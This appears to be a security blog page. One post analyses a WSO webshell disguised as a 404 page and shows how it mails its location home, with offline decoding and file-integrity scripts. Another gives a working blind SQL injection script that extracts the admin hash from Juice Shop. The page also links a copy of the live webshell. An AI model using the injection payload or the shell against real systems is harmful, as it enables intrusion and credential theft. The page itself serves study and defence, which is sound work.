Monday, February 19, 2018

Reversing a Webshell - WSO 2.7

Recently, I stumbled across a webshell that was impersonating a "404 page not found" error.  The original filename was "404.php.gif": the double extension makes the file look like an image while, depending on the server's handler configuration, it is still executed as PHP.  I did notify the owner of the site.  After acquiring the webshell and placing it in a VM, you quickly see the 404 message.

Viewing the source of the page then reveals code that is not rendered and that is requesting a password.


The source code is base64-encoded and compressed, so it has to be decoded and inflated before it can be read.  After extracting the original code you see the following heading.


You quickly find the password, stored as an MD5 hash.  Instead of cracking the hash, I find the check in the code and comment it out so I can get past it.  Then the main interface of the webshell loads.


Looking through the code you find a base64-encoded section that sends an email to a Gmail account.


The email contains the host the webshell is running on and the MD5 of the password used to access it.  This code is executed every time someone accesses the webshell, so whoever receives that mail learns where each copy of the shell is installed, not just the operator who planted it.
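As an added example, not code from the post or from WSO itself, the following Python script automates the two manual steps above: it peels the eval(gzinflate(base64_decode('...'))) wrapper layers off a PHP file, then pulls out the things the post goes looking for by hand, namely a 32-character hex literal assigned to a variable (the MD5 password gate) and any leftover base64_decode('...') literals (the mail-home block).  The wrapper form, the variable name $auth_pass, and the two-layer sample it runs against are assumptions constructed for the demo, and it goes slightly beyond the post by also accepting gzuncompress/gzdecode wrappers.

```python
import base64
import re
import zlib

# Assumed wrapper shape: eval(<inflate>(base64_decode('...'))).  Packed shells
# stack several of these; the inflate function varies between samples.
WRAPPER_RE = re.compile(
    r"eval\s*\(\s*(gzinflate|gzuncompress|gzdecode)\s*\(\s*base64_decode\s*\(\s*"
    r"['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)",
    re.IGNORECASE,
)
# A 32-hex-digit string literal assigned to a PHP variable (the MD5 gate).
MD5_ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*['\"]([0-9a-f]{32})['\"]", re.IGNORECASE)
# Any other base64_decode('...') literal left in the decoded source.
B64_LITERAL_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")


def php_inflate(func, data):
    """PHP gzinflate() is raw DEFLATE (wbits=-15); gzuncompress() is zlib and
    gzdecode() is gzip, both handled by wbits=47 (header auto-detect)."""
    if func.lower() == "gzinflate":
        return zlib.decompress(data, -15)
    return zlib.decompress(data, 47)


def unwrap(php_source, max_layers=16):
    """Peel wrapper layers until no eval(...(base64_decode())) remains.
    Returns (decoded_source, layers_removed); max_layers stops a decompression bomb."""
    layers = 0
    while layers < max_layers:
        m = WRAPPER_RE.search(php_source)
        if m is None:
            break
        func, blob = m.group(1), re.sub(r"\s+", "", m.group(2))
        php_source = php_inflate(func, base64.b64decode(blob)).decode("utf-8", "replace")
        layers += 1
    return php_source, layers


def find_md5_literals(php_source):
    """[(variable, hash)] for every 32-hex literal assignment, e.g. the login gate."""
    return MD5_ASSIGN_RE.findall(php_source)


def find_hidden_strings(php_source):
    """Decode leftover base64_decode('...') literals (mail address, subject, ...)."""
    found = []
    for blob in B64_LITERAL_RE.findall(php_source):
        try:
            found.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            continue
    return found


# --- constructed sample (not the real 404.php.gif) so the script runs offline ---
def php_gzdeflate(data):
    """Mirror of PHP gzdeflate(): raw DEFLATE, no header."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def wrap(php_source):
    blob = base64.b64encode(php_gzdeflate(php_source.encode())).decode()
    return "<?php eval(gzinflate(base64_decode('" + blob + "'))); ?>"


SAMPLE_MAIL_TO = base64.b64encode(b"shell-author@example.com").decode()  # hypothetical address
SAMPLE_INNER = (
    "<?php\n"
    "$auth_pass = \"d41d8cd98f00b204e9800998ecf8427e\";\n"   # md5(''), placeholder hash
    "@mail(base64_decode('" + SAMPLE_MAIL_TO + "'), $_SERVER['HTTP_HOST'], $auth_pass);\n"
    "header('HTTP/1.1 404 Not Found');\n"
    "echo '404 Not Found';\n"
)
SAMPLE = wrap(wrap(SAMPLE_INNER))   # two stacked layers, like a packed shell

if __name__ == "__main__":
    decoded, layers = unwrap(SAMPLE)
    print("layers removed:", layers)
    print("md5 literals:", find_md5_literals(decoded))
    print("hidden strings:", find_hidden_strings(decoded))
```

Against a real sample, replace SAMPLE with the file contents; decoding statically like this, rather than letting PHP run the eval chain, means the mail-home code never executes while you are looking at it.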

This webshell has full access to the files on the site.  That lets the shell operator find the config.inc.php file containing the database credentials, which can then be entered into the "Sql" section of the webshell to get full access to the database.

In addition to the functions mentioned above, the webshell has built-in functions to open a shell using Perl, open a reverse shell using Perl, run system commands through PHP, search for local file inclusion vulnerabilities, port-scan the local host, port-scan other hosts on the same or other networks, and more.

Keep your sites updated and verify that your code has not changed; a file-integrity baseline of the web root is what catches a dropped file like this one.  Here is a copy of the webshell if you would like to explore it.  Password is "malware".
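As an added example, not part of the original post, here is the "verify your code has not changed" check as a script: it hashes every file under a web root, diffs that against a stored baseline, and separately flags files shaped like the 404.php.gif above (a .php hidden before the final extension, or PHP markers inside a file with an image extension).  The web root, its files and the planted shell are all constructed in a temporary directory so it runs offline; the image-extension list and the marker regex are assumptions.

```python
import hashlib
import json
import os
import re
import tempfile

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png", ".ico", ".bmp"}   # assumed list
# PHP open tag, or an eval-of-decoder call, anywhere in the first 4 KiB.
PHP_MARKER_RE = re.compile(rb"<\?php|<\?=|eval\s*\(\s*(?:gzinflate|base64_decode)")


def walk_files(root):
    """Yield (relative_posix_path, absolute_path) for every regular file."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full):
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """relative path -> sha256 digest; store this off the box as the baseline."""
    return {rel: sha256_file(full) for rel, full in walk_files(root)}


def diff_snapshots(baseline, current):
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def suspicious_files(root):
    """Files shaped like '404.php.gif': a php extension buried before the
    final one, or PHP markers inside a file with an image extension."""
    hits = []
    for rel, full in walk_files(root):
        name = os.path.basename(rel).lower()
        parts = name.split(".")
        hidden_php_ext = len(parts) > 2 and "php" in parts[1:-1]
        with open(full, "rb") as f:
            head = f.read(4096)
        php_in_image = (os.path.splitext(name)[1] in IMAGE_EXTS
                        and PHP_MARKER_RE.search(head) is not None)
        if hidden_php_ext or php_in_image:
            hits.append(rel)
    return sorted(hits)


def demo():
    """Constructed web root: take a baseline, tamper with it, rescan."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "images"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php echo 'hello'; ?>\n")
        with open(os.path.join(root, "images", "logo.gif"), "wb") as f:
            f.write(b"GIF89a" + b"\x00" * 32)          # harmless real image stub
        # Round-trip through JSON, as a baseline stored on disk would be.
        baseline = json.loads(json.dumps(snapshot(root)))

        # Simulated intrusion: a legitimate file edited, a fake-404 shell dropped.
        with open(os.path.join(root, "index.php"), "a") as f:
            f.write("// tampered\n")
        with open(os.path.join(root, "images", "404.php.gif"), "wb") as f:
            f.write(b"GIF89a<?php eval(gzinflate(base64_decode('AAAA'))); ?>")

        return {"diff": diff_snapshots(baseline, snapshot(root)),
                "suspicious": suspicious_files(root)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline is only worth something if it is kept somewhere the shell operator cannot edit, so write the snapshot JSON off the web server (or sign it) rather than next to the files it describes.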

Tuesday, February 13, 2018

Juice-shop Challenge with SQL Injection

In a challenge to create an automated way to extract the password hash from Juice-Shop at the login prompt through SQL injection, I created the following script.  It is a boolean-based blind attack: each request asks whether the first N characters of the stored hash equal a guessed hex prefix, and a successful login (the response echoes the e-mail address) confirms the guess, so the hash comes out one character at a time with at most 16 requests per position.



#!/usr/bin/env python3
# Boolean-based blind SQL injection against the Juice Shop login endpoint.
# Each request asks whether the first N characters of the admin's password
# hash equal a guessed prefix; a successful login (the response echoes the
# e-mail address) means the guess was right.

import json
import subprocess

URL = "http://172.17.0.2:3000/rest/user/login"
HEX_DIGITS = "0123456789abcdef"

currentHash = ""
for sizeHash in range(1, 33):                 # an MD5 hex digest is 32 characters
    for hashString in HEX_DIGITS:
        guess = currentHash + hashString
        # Closes the email string, appends the prefix test, comments out the rest.
        email = "admin@juice-sh.op' AND '" + guess + "'=substr(password,1," + str(sizeHash) + ")--;"
        payload = json.dumps({"email": email, "password": "test"})
        # Argument list instead of shell=True, so the quotes in the payload need no escaping.
        output = subprocess.check_output(
            ["curl", "-s", "-H", "Content-Type: application/json", "-d", payload, URL],
            stderr=subprocess.STDOUT).decode("utf-8", "replace")
        if "admin@juice-sh.op" in output:
            currentHash = guess
            print("Hash: " + currentHash)
            break
    else:
        # No digit matched: the server did not answer as expected, so stop
        # rather than silently continuing with a wrong prefix.
        raise SystemExit("no match at position " + str(sizeHash) + ", have: " + currentHash)
print("MD5 hash of admin@juice-sh.op: " + currentHash)
# Validate hash with the following command: echo -n "admin123" | md5sum
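As an added example that is not part of the original post, here is the same boolean-based blind extraction run offline against an in-memory SQLite table, so the oracle can be studied without a running Juice Shop.  The vulnerable query is modelled on the string-concatenated login query in Juice Shop's login route and the admin123 default password is Juice Shop's; the second user row and the exact table layout are assumptions for the demo.  A parameterised version of the same query sits beside it to show why the payload stops working once the quote is treated as data.

```python
import hashlib
import sqlite3

HEX_DIGITS = "0123456789abcdef"
ADMIN = "admin@juice-sh.op"


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_db():
    """In-memory stand-in for Juice Shop's Users table (MD5 password hashes).
    admin123 is the real default; the second row is constructed."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, email TEXT, "
                "password TEXT, deletedAt TEXT)")
    for email, pw in [(ADMIN, "admin123"), ("someone@juice-sh.op", "constructed-pw")]:
        con.execute("INSERT INTO Users (email, password) VALUES (?, ?)", (email, md5_hex(pw)))
    return con


def vulnerable_login(con, email, password):
    """Same shape as the injectable query: user input concatenated into the SQL."""
    sql = ("SELECT id, email FROM Users WHERE email = '" + email +
           "' AND password = '" + md5_hex(password) + "' AND deletedAt IS NULL")
    return con.execute(sql).fetchone()


def safe_login(con, email, password):
    """Hardened form: bound parameters, so the quote in the payload is just data."""
    return con.execute("SELECT id, email FROM Users WHERE email = ? AND password = ? "
                       "AND deletedAt IS NULL", (email, md5_hex(password))).fetchone()


def oracle_payload(prefix):
    """The email field the blog script sends: the row matches iff the stored
    hash starts with prefix; '--' comments out the password clause."""
    return ADMIN + "' AND '" + prefix + "'=substr(password,1," + str(len(prefix)) + ")--;"


def extract_hash(con, login=vulnerable_login, length=32):
    """Boolean-based blind extraction, one hex digit per position.
    Returns (hash, number_of_login_attempts)."""
    found, attempts = "", 0
    for _ in range(length):
        for d in HEX_DIGITS:
            attempts += 1
            row = login(con, oracle_payload(found + d), "test")
            if row is not None and row[1] == ADMIN:     # login succeeded: guess was right
                found += d
                break
        else:
            raise RuntimeError("no digit matched after " + repr(found) +
                               "; server error or non-hex hash")
    return found, attempts


if __name__ == "__main__":
    db = make_db()
    h, n = extract_hash(db)
    print("recovered:", h, "in", n, "login attempts")
    print("same payload against the parameterised query:",
          safe_login(db, oracle_payload("0"), "test"))
```

Swapping login=safe_login into extract_hash raises the RuntimeError at the first position, which is the behaviour you want from the fixed endpoint and a quick regression test for the fix.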

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...